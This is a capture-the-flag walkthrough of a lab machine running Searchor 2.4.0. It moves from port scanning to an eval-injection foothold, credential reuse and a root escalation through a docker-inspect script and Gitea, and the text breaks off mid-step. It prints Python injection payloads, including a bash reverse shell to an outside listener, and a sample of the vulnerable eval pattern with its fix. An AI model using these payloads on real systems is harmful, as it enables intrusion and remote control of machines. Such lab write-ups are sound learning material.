I scanned the ports with the nmap command.
Enumeration

I added the domain name to /etc/hosts.

Initial Foothold
I searched whether Searchor 2.4.0 is vulnerable or not.


Okay. There is a vulnerable version and a weakness that allows arbitrary code execution.
'+%2b+__import__('os').popen('id').read()+%2b+'

'+%2b+__import__('os').popen('bash+-c+"sh+-i+>%26+/dev/tcp/10.10.14.17/9001+0>%261"').read()+%2b'
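
Why a payload of the form ' + <expression> + ' gets executed, and how the pattern is closed: this is an added example, not part of the original writeup and not Searchor's own code. It assumes the application pastes the query into a Python source string and evaluates it; Engine, search_vulnerable, search_hardened and PROBE are hypothetical names, and the probe is a harmless constructed value.

```python
from enum import Enum
from urllib.parse import quote


class Engine(Enum):
    """Hypothetical stand-in for a search-engine table (not Searchor's code)."""
    Google = "https://www.google.com/search?q={query}"
    DuckDuckGo = "https://duckduckgo.com/?q={query}"

    def search(self, query: str) -> str:
        # The query is only ever treated as data and percent-encoded.
        return self.value.format(query=quote(query, safe=""))


def search_vulnerable(engine: str, query: str) -> str:
    # ASSUMED pattern: user input is pasted into Python source and evaluated.
    # A single quote in `query` ends the string literal, so everything after
    # it is parsed as an expression.
    return eval(f"Engine.{engine}.search('{query}')")


def search_hardened(engine: str, query: str) -> str:
    # Look the engine up by name and pass the query as an argument;
    # no user-controlled text is ever parsed as code.
    try:
        return Engine[engine].search(query)
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None


# Constructed, harmless probe with the same shape as the payloads above
# (after form decoding, "+" is a space and "%2b" is a literal "+").
PROBE = "' + str(6 * 7) + '"

if __name__ == "__main__":
    print(search_vulnerable("Google", PROBE))  # expression was evaluated
    print(search_hardened("Google", PROBE))    # probe stays inert text
```

The hardened form removes the eval call entirely instead of filtering quotes, so there is no string left for the input to break out of.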

I got the reverse shell and read the user flag.

A little while later, I found the config, and there is a credential for cody in it. cody's password is also the svc user's password. I logged in as the svc user.



Privilege Escalation


I looked at the docker config via the docker-inspect command.
sudo python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' 960

I executed the docker-ps command and saw that mysql runs on the system, and I logged in to mysql with the gitea credentials.

I saw the administrator's password, but I could not crack the hash, and I tried the config password that I found with the docker-inspect command. Yes, it works.

I logged in to gitea as the administrator user and examined the code. I found a vulnerability that leads to getting the root user.

I prepared the payload to execute in the home/svc and

